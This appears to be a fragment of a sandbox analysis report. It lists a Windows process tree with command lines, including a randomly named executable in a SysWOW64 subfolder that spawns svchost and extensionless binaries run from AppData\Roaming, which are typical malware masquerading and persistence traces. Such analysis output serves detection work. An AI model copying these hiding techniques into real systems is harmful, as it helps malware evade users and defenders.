C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6608
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3268
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7732
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cf9c75c24d2141fb862d26356790bde3 /t 7696 /p 32681⤵PID:7868
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7436
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:6844
-
-
C:\Windows\SysWOW64\sgyhbcur\iccteneg.exeC:\Windows\SysWOW64\sgyhbcur\iccteneg.exe /d"C:\Users\Admin\AppData\Local\Temp\8018.exe"1⤵PID:6816
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:7076
-
-
C:\Users\Admin\AppData\Roaming\cjeigsaC:\Users\Admin\AppData\Roaming\cjeigsa1⤵PID:5684
-
C:\Users\Admin\AppData\Roaming\jdeigsaC:\Users\Admin\AppData\Roaming\jdeigsa1⤵PID:5812